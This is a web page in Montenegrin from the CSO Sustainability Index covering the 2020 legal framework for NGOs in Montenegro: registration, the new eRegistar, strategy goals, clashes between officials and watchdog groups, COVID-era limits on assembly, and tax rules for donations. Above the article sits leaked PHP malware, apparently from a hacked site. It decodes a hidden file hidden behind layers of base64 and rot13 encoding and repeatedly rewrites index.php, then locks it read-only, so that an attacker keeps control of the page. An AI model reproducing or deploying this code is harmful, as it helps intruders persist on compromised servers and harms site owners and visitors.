$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Pravno okruženje | NVO Indeks

Pravno okruženje

Pravno okruženje za djelovanje OCD-a se nije značajno promijenilo u 2020. godini.

Osnivanje, registracija, pravno svojstvo, finansiranje i drugi aspekti djelovanja nevladinih udruženja i fondacija su uređeni Zakonom o nevladinim organizacijama (u daljem tekstu: Zakon o NVO). Zakon se ne primjenjuje na političke partije, vjerske zajednice, sindikalne organizacije, sportske organizacije, poslovna udruženja i druge fondacije ili organizacije čije je osnivač država. U 2020. godini, Ministarstvo javne uprave je otpočelo proces pripreme Analize Zakona o NVO, u cilju procjene efekata njegove primjene i pokretanja postupka izmjene i dopune zakona. U junu 2020. godine je uspostavljena radna grupa u kojoj učestvuju tri predstavnika NVO koji su izabrani na osnovu javnog poziva, kao i pet predstavnika državnih organa.

 Osnivanje organizacije civilnog društva je prilično jednostavan proces. Nevladino udruženje mogu osnovati najmanje tri lica, od kojih jedno mora imati prebivalište, boravište ili sjedište u Crnoj Gori. Osnivač može biti i maloljetno lice sa navršenih 14 godina života, uz saglasnost zakonskog zastupnika. Nevladinu fondaciju može osnovati jedno ili više lica, nezavisno od prebivališta, boravišta ili sjedišta u Crnoj Gori. Fondacija se može osnovati i testamentom. Strana nevladina organizacija može djelovati u Crnoj Gori nakon što upiše svoje predstavništvo. Prijava za osnivanje NVO može biti odbijena ukoliko organizacija svojim statutom predviđa ciljeve koji su u suprotnosti sa Ustavom ili zakonom. Protiv takvog rješenja se može podnijeti tužba sudu. U 2020. godini je odbijen upis za pet NVO.

U 2020. je uspostavljen eRegistar nevladinih organzacija kojim rukovodi Ministarstvo javne uprave. Međutim, ne postoji razlika u odnosu na registar NVO koji je ranije vodilo Ministarstvo unutrašnjih poslova, osim što se informacije sada redovno ažuriraju. Iako je to bilo planirano, u eRegistru još uvijek nije dostupno više informacija o samim organizacijama, poput statuta ili kontakt podataka. Ministarstvo javne uprave takođe vodi i veb bazu podataka o NVO (www.nvoinfo.me) u koju organizacije mogu same da unose podatke, međutim, ova bazu ne koristi veliki broj organizacija.  

Ciljevi Strategije unapređenja podsticajnog okruženja za djelovanje NVO 2018-2020 su djelimično ostvareni. Po izvještaju o realizaciji iz juna 2020. godine, nije realizovana trećina planiranih aktivnosti, od čega najveći broj iz strateške oblasti kojom je obuhvaćena uloga NVO u socio-ekonomskom razvoju. Najznačajnije postignuće strategije se veže za unapređenje normativnog okvira za djelovanje NVO, prije svega, uspostavljanje novog sistema za davanje finansijske podrške projektima i programima NVO iz budžeta, kao i uredba o sprovođenju javnih rasprava. Oba dokumenta su usvojena 2018. godine. Donošenje novog strateškog dokumenta za djelovanje NVO je planirano za 2021. godinu. U izvještaju o implementaciji prethodne strategije je preporučeno da se novim strateškim dokumentom obuhvate pitanja donatorske koordinacije, regulisanja normativnog okvira kojim se, između ostalog, garantuje sloboda izražavanja, okupljanja i udruživanja, mjere za adekvatnu primjenu Zakona o volontiranju i donošenje adekvatnih mjera za socio-ekonomsko osnaživanje NVO.

OCD na papiru uživaju prava i slobode u obavljanju svojih aktivnosti i vlasti često izražavaju svoju posvećenost saradnji sa civilnim sektorom. Uprkos tome, dolazilo je do atmosfere konfrontacije u situacijama kada se kritikuju vladine politike i djelovanja javnih funkcionera. Nakon što je NVO Mreža za afirmaciju nevladinog sektora (MANS) u septembru 2020. godine objavila detalje istraživanja o projektu izgradnje sekundarne kanalizacione mreže koji je dodijeljen kompaniji koja je prethodno bila pravosnažno osuđena za utaju poreza i doprinosa i stvaranje kriminalne organizacije, gradonačelnik Glavnog Grada je iznio uvrede na račun MANS-a i aktivistu ove organizacije. NVO Centar za građansko obrazovanje (CGO) je zatražio informacije kako bi se ispitala regularnost konkursa Ministarstva nauke za dodjelu stipendija za doktorska istraživanja, zbog čega je ministarka tog resora negativno reagovala na Facebook nalogu ove organizacije.

Sloboda okupljanja je bila ograničena od početka pandemije. Međutim, ove mjere su se poštovale selektivno, pa je organizovan cio niz masovnih okupljanja. Akcija za ljudska prava i Institut alternativa podnijeli su Ustavnom sudu inicijativu za ocjenu ustavnosti naredbe o zabrani održavanja političkih skupova i ograničavanju vjerskih okupljanja i predložili obustavu ovih mjera. Smatrali su da su naredbom uvedena pretjerana i nesrazmjerna ograničenja prava na slobodu mirnog okupljanja zbog zaštite zdravlja i da su ona diskriminatornog karaktera. Rješenje Ustavnog suda kojim se odbacuje inicijativa izdato je 28. januara 2021. godine.

Zakon o porezu na dobit pravnih lica priznaje donacije registrovanim NVO do 3.5 % ukupnih prihoda na nivou godine kao poreski rashod. Samo donacije koje podržavaju pitanja koja su definisana zakonom ispunjavaju uslove za ove pogodnosti. Zakon o porezu na dohodak fizičkih lica propisuje da se donacije priznaju kao rashod najviše do 3% ukupnog godišnjeg prihoda donatora. Iako je to bilo planirano, Zakon o porezu na dohodak fizičkih lica još uvijek nije usklađen sa Zakonom o porezu na dobit pravnih lica i Zakonom o NVO u pogledu proširivanja liste djelatnosti od javnog interesa kojima se izdaci priznaju kao rashod. Na projektima koje finansira EU, svi troškovi iznad 50 eura oslobođeni su poreza na dodatu vrijednost (PDV).

OCD mogu obavljati privredne djelatnosti utvrđene statutom ako su upisane u registar privrednih subjekata. Zakonom se propisuje limit po kojem prihod od djelatnosti ne smije prelaziti iznos od 4.000 eura u datoj godini ili 20% ukupnog prihoda za prethodnu godinu. U slučaju prekoračenja limita, prihod se uplaćuje u državni budžet. Nevladine organizacije ne plaćaju porez na dobit ako su osnovane za obavljanje neprofitne djelatnosti.

OCD pružaju besplatnu pravnu pomoć i besplatno pravno savjetovanje ranjivim kategorijama stanovništva. Nijedna organizacija se primarno ne bavi pružanjem pravne pomoći OCD, osim što Akcija za ljudska prava u pojedinim slučajevima pruža pravnu pomoć aktivistima civilnog društva.

* Izjava o odricanju odgovornosti: Ovdje su iznesena mišljenja panelista i drugih istraživača u projektu i ne odražavaju nužno stavove USAID-a ili FHI 360.

Indeks održivosti OCD-a je analitički instrument koji mjeri napredak civilnog sektora u regionu Centralne i Istočne Evrope i Evroazije.

››  Indeks ispituje sveukupno okruženje za razvoj civilnog društva,
kroz sedam dimenzija. ‹‹

© 2020 Centar za demokratsku tranziciju